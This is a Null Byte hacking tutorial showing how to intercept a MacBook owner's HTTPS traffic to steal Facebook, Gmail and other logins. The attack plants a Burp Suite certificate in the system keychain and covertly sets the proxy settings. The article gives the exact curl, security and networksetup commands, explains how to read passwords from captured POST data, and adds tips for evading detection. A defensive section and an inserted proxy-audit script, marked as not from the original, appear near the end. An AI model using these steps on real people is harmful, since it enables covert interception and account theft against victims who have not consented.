
How to Hack Facebook & Gmail Accounts Owned By MacOS Targets « Null Byte :: WonderHowTo



It only takes a few commands to manipulate the secure HTTPS traffic of a MacBook and pluck login passwords out of the encrypted data. Let's take Facebook and Gmail hacking to the next level by capturing real-time web traffic from Safari and Google Chrome.

Both Facebook and Gmail have exceptional web application security practices. They quickly block IP addresses that perform brute-force attacks and lock accounts after only a few failed login attempts.

In addition, successful logins originating from a new IP address or web browser trigger these websites to further verify the login. This could mean the target is asked to match friends to their Facebook profile pictures, or that a one-time code is sent to the target's smartphone.

In truth, it will usually be easier to compromise a target's operating system for credentials.

This article focuses specifically on learning the Facebook and Gmail passwords of a macOS target on a shared Wi-Fi network. To follow along, readers must have access to the target's MacBook to perform this attack. This can be accomplished in various ways: with just a few moments of physical access, the MacBook can be compromised with a single-user-mode attack. Alternatively, social engineering the target into opening a trojanized file on a USB drive may be the best option.

Understanding the Attack

Essentially, we force the target's Safari or Chrome browser to send all HTTP and HTTPS requests to a Burp Suite proxy we control. After receiving the web traffic, Burp is able to read all of the HTTPS data in real time. Normally this would not be possible, but we configure the target's operating system to trust the SSL certificate used by our proxy.

For readers who have previously configured their own browser to use a Burp proxy: that's exactly what we do with the target's browsers, but without their knowledge.

We start by setting up Burp in Kali Linux to intercept the traffic. Then we download the Burp certificate via our backdoor and import it into the target's keychain so that Safari or Chrome do not warn them about suspicious certificate activity. Finally, we configure the MacBook to send all HTTP and HTTPS traffic to our Burp proxy.

Our attack requires root privileges because a normal user cannot import certificates into the macOS system keychain. Root can be obtained by backdooring the MacBook or through privilege escalation attacks such as password phishing, using Empire to dump the target's password hash, dumping the browser cache, and looking for frequently reused passwords.

Step 1: Install Burp Suite (if required)

Depending on your version of Kali Linux, Burp Suite may not be installed yet. To install Burp, use the following apt-get command:

  apt-get update && apt-get install burpsuite 

Step 2: Set up Burp Suite

Open Burp, click on the "Proxy" tab, then on the "Options" tab, and click the "Edit" button under Proxy Listeners. Enter the desired bind port in the field provided. I use 9999 because it's easy to remember, but this number is arbitrary.

Next, specify the address to bind to. This attack is designed for a local area network, so your 192.168.1.xx address should be used. I'm doing this in an internal lab, so my attacker's local IP address is 10.42.0.1. If in doubt, the "All interfaces" option can be used instead.

Click "OK" to save the changes. Then go back to the "Intercept" tab and make sure that "Intercept is off" is selected. Disabling interception allows the target's web traffic to flow without interruption while Burp continues to act as a proxy.

Step 3: Download Burp Certificate

On the target's MacBook, via our backdoor, first download the Burp certificate from our Burp proxy. To do this, use the following curl command:

  curl -s --insecure --proxy http://10.42.0.1:9999 http://burp/cert -o /tmp/burp.der

In the above command, curl silently (-s) downloads the certificate from our Kali machine. The --proxy argument is required because we instruct curl to fetch the certificate through the newly configured Burp listener. Burp's certificate is not trusted by curl (or a web browser) by default, so the --insecure argument is needed to ignore certificate warnings. Finally, the Burp certificate is saved (-o) to the /tmp directory with the filename burp.der. The .der extension is just the default file format of the certificate and should not be changed.

Step 4: Importing the Burp Certificate

Now import the downloaded Burp certificate into the target's keychain using the following security command:

  security add-trusted-cert -k /Library/Keychains/System.keychain -d /tmp/burp.der

Here, security adds (add-trusted-cert) the certificate (-d /tmp/burp.der) as fully trusted to the primary macOS system keychain (-k /Library/Keychains/System.keychain). All we have to do now is configure macOS to send the target's entire web traffic to us.

Step 5: Configure MacBook Proxy Settings

At this point, we can use our backdoor to configure the target MacBook to send all of its HTTP and HTTPS web traffic to us.

Networksetup is a command-line tool that configures network settings in the macOS system settings. Using networksetup from the command line is similar to changing the network settings in macOS directly, as if we were sitting in front of the MacBook.

Use the networksetup command with the -listallnetworkservices argument to list the available network services:

  /usr/sbin/networksetup -listallnetworkservices

iPhone USB
Wi-Fi
Bluetooth PAN
Thunderbolt Bridge

Note the "Wi-Fi" service here. This is the service we most likely need to change. If the target uses an external wireless adapter, it may also appear here, in which case an attacker would need to change that service's proxy settings instead.

The -getwebproxy (HTTP) and -getsecurewebproxy (HTTPS) arguments can be used to display any existing proxy settings the target may have configured themselves:

  /usr/sbin/networksetup -getwebproxy "Wi-Fi"

Enabled: No
Server:
Port: 0
Authenticated Proxy Enabled: 0

  /usr/sbin/networksetup -getsecurewebproxy "Wi-Fi"

Enabled: No
Server:
Port: 0
Authenticated Proxy Enabled: 0

As we can see, the HTTP and HTTPS proxies are disabled. This is a good thing, since the target has probably never changed their proxy settings and is unlikely to look there if applications start acting strangely.

To route the target's HTTP and HTTPS traffic through our Burp proxy, use the following commands:

  /usr/sbin/networksetup -setwebproxy "Wi-Fi" 10.42.0.1 9999
  /usr/sbin/networksetup -setsecurewebproxy "Wi-Fi" 10.42.0.1 9999

Remember to change the IP address of the attacker (10.42.0.1) to your local network address. If you have chosen a port number other than 9999, you must also change this in the above commands. The newly configured proxy settings take effect immediately.

Step 6: Capture Facebook Passwords

In Burp Suite, go to the HTTP History tab to see the target's web traffic in real time. Pay close attention to requests with POST in the Method column, because they contain the most compromising data. For example, the Facebook email address and password are visible in the following screenshot.

The target's email address (target@email.com) and password are very easy to identify thanks to Facebook's clearly named "email=" and "pass=" parameters.

Step 7: Capture Gmail Passwords

Sites like Gmail, however, are harder to handle, especially if the target uses a strong password that contains many special characters. Special characters are automatically URL-encoded by web browsers, which makes the password much harder to recognize in a wall of encoded gibberish (see below).

  • Example password: g$FR3eDW&ujYH6I{*]5aa
  • Encoded as: g%24FR3eDW%26ujYH6I%7B*%5D5aa

As we can see, it's like trying to find a needle in a haystack. The trick is to isolate the problem. At the time of writing, Gmail sends the user's encoded password in the "f.req=" parameter (see below).

Select the entire parameter and copy the text. Then open the Decoder tab in Burp and paste the encoded text into the top window. Click the "Decode as" button and select the "URL" option.

The bottom window now displays the decoded text in a slightly more readable format. Copy the decoded text and paste it into your favorite text editor (Gedit, Geany, etc.).

We can see that the data is separated by many commas in an array-like format. In the case of Gmail, the password is in quotes between the eighth and ninth commas (see below).

Facebook and Gmail are just two examples. The parameters that contain email addresses and passwords will likely differ for every login we intercept. This is especially true of the top 100 websites, which handle authentication differently and apply state-of-the-art security practices. Readers are encouraged to test this attack against their target site (if Facebook is not your target) to learn how its login parameters are handled, which makes passwords easier to find.

Step 8: Disabling the Proxy on the Target MacBook

After completing the attack, remember to disable the previously configured proxy settings. Otherwise, the target will keep sending web traffic to your IP address long after you have disconnected from the Wi-Fi network. Such activity is likely to arouse suspicion, because the target cannot access the internet without your Burp proxy.

Use the following networksetup commands to disable the proxy settings on the target MacBook:

  /usr/sbin/networksetup -setwebproxystate "Wi-Fi" off
  /usr/sbin/networksetup -setsecurewebproxystate "Wi-Fi" off

Improving the Attack

There are some limitations and areas where this attack can be improved.

Option 1: Remote Hacking with Mitmproxy

Alternatively, Mitmproxy can be used to intercept, inspect, modify, and replay web traffic much like Burp. While Burp is more sophisticated and fully featured, Mitmproxy has a command-line interface that can easily run on a virtual private server. Using a VPS would allow an attacker to intercept the target's web traffic as they move between different Wi-Fi networks.

Option 2: Firefox Warning

Configuring macOS to use the Burp proxy also forces Firefox to send its requests to the attacker's device. However, unlike Safari and Chrome, Firefox is not affected by importing the Burp certificate into the macOS keychain, because Firefox validates certificates independently and does not use the macOS keychain. If the target uses Firefox alongside Safari or Chrome, they will probably notice the suspicious activity. Below is an example of Firefox flagging the Burp certificate.

Option 3: More apps configured for the macOS proxy

Like Firefox, applications such as Spotify, Skype, VLC, Thunderbird, and the Opera web browser validate certificates without using the macOS keychain. This could cause those applications to notify the target of suspicious activity or stop working entirely.

Unfortunately, after configuring the Burp proxy, I did not run any tests on popular third-party applications. Readers are encouraged to continue this research and find out for themselves whether such applications are affected by the proxy before performing this attack in real-world scenarios.

Option 4: Custom SSL Certificates

In this guide, we used the default SSL certificate that Burp Suite generates automatically. When a target views the certificate in Safari or Chrome, the "PortSwigger CA" certificate (shown below) is displayed. PortSwigger, the creator of Burp Suite, is clearly the issuer of this certificate, which would be an instant red flag. Creating a unique certificate with a convincing domain name may keep the target from identifying the fraudulent certificate.

Protecting Yourself from Keychain and SSL-Based Attacks

There is no simple solution here. Antivirus software will not flag the imported Burp certificate as suspicious, so it's up to us to regularly monitor our keychain for unusual activity.

If an attacker has root privileges and imports certificates into your operating system, you have bigger issues to deal with. Identifying an attacker on your system can be extremely difficult. However, the following solutions may help:

Tip 1: Check Your Keychain

We cannot rely on common antivirus software to protect our certificates. The Keychain app can be opened by searching for "Keychain" in Spotlight. Don't be afraid to look around. Certificate details can be expanded and analyzed. If you find something you did not put there, don't panic; it may have been added by a legitimate application in the past.

For certificates we're not sure about, we can Google them and/or ask for help in communities like the official Apple Support Community, Apple StackExchange, and Information Security StackExchange.

Tip 2: Check your proxy settings

The proxy settings are a bit harder to find. Use Spotlight to search for "Proxy", then click the "Advanced" button. Next, click the "Proxies" tab and check the Web Proxy (HTTP) and Secure Web Proxy (HTTPS) entries. If you did not set these proxies yourself, disable them and click OK.
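The same check can be scripted so it runs regularly instead of relying on someone remembering to open System Preferences. The script below is an added example, not part of the original article: parse_proxy understands the networksetup output format shown in Step 5, is_unexpected compares the configured proxy host against an allow-list, and audit_proxies walks every network service on the Mac. The allow-list host proxy.corp.example is a constructed placeholder.

```shell
#!/bin/sh
# Added example, not from the original article: audit macOS proxy
# settings for an HTTP/HTTPS proxy you did not configure yourself.
# Requires /usr/sbin/networksetup on macOS; parse_proxy and
# is_unexpected are pure POSIX sh + awk and can be tested anywhere.

# Read "networksetup -getwebproxy"/"-getsecurewebproxy" output on
# stdin; print "DISABLED" or "ENABLED <server>:<port>".
parse_proxy() {
  awk '
    /^Enabled:/ { e = $2 }
    /^Server:/  { s = $2 }
    /^Port:/    { p = $2 }
    END {
      if (e ~ /^Yes/) printf "ENABLED %s:%s\n", s, p
      else            print "DISABLED"
    }'
}

# Return 0 (true) when $1 (a parse_proxy result) names a proxy host
# that is not in the space-separated allow-list $2.
is_unexpected() {
  [ "$1" = DISABLED ] && return 1
  host=${1#* }          # drop the "ENABLED " prefix
  host=${host%%:*}      # drop the ":port" suffix
  for ok in $2; do
    [ "$host" = "$ok" ] && return 1
  done
  return 0
}

# Walk every network service (Wi-Fi, Thunderbolt Bridge, ...) and report
# any proxy not on the allow-list. The first output line of
# -listallnetworkservices is a legend and a leading "*" marks a
# disabled service, so both are stripped before use.
audit_proxies() {
  allow=${1:-proxy.corp.example}   # constructed placeholder allow-list
  /usr/sbin/networksetup -listallnetworkservices | sed '1d; s/^\*//' |
  while IFS= read -r svc; do
    for kind in webproxy securewebproxy; do
      state=$(/usr/sbin/networksetup "-get$kind" "$svc" | parse_proxy)
      if is_unexpected "$state" "$allow"; then
        echo "SUSPICIOUS: $svc $kind -> $state"
      fi
    done
  done
}

if [ "$(uname)" = Darwin ]; then audit_proxies "$@"; fi
```

Run it from a launchd job or cron entry and alert on any SUSPICIOUS line; a proxy pointing at another host on the local network, as in Step 5, is exactly what it is meant to catch.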

Tip 3: Check Your Browser Certificates

Before logging in to a website, it is usually a good idea to check its SSL certificate. In Safari and Chrome, click the padlock icon in the URL bar, then click the "View Certificate" or "Certificate" button. This opens a new window with the certificate details. Click the "Details" option and scroll down to the SHA-256 and SHA-1 fingerprints at the bottom of the certificate.

Then, using an additional device (such as another laptop or smartphone), inspect the website's certificate again and compare the fingerprints, which should match exactly. If the fingerprints do not match across all your devices, this could be a sign that a fraudulent certificate is in effect.

Tip 4: Examine Your Web Traffic

Wireshark is an excellent tool for identifying suspicious traffic leaving your computer. If an attacker has set up a backdoor, they are probably using Netcat or Python to establish TCP connections between your machine and their server at set intervals. In the following screenshot, we can see the attacker (10.42.0.1) issuing commands to the target MacBook (10.42.0.98) on port 4444.

Beyond Facebook & Gmail Hacking

While Facebook and Gmail were used as examples in this article, manipulating a MacBook's web traffic in this way in fact allows an attacker to intercept all HTTPS traffic for every website the target visits. This means Amazon, Twitter, Instagram, Yahoo, and bank logins are intercepted and immediately compromised, even if the target is already signed in.

I hope this tutorial has inspired some readers to think differently about post-exploitation. HTTPS-based attacks are considered by some to be the highest level of hacking. If we continue to find ways to circumvent the encryption, targets will have little opportunity to defend themselves against such attacks. There is no telling how many network-based attacks become possible once SSL protection is no longer an obstacle.

Follow me on Twitter @tokyoneon_, or leave questions and comments if you have them.

Don't Miss: How to Hack Mojave 10.14 with a Self-Destructing Payload

Cover image and screenshots by tokyoneon/Null Byte



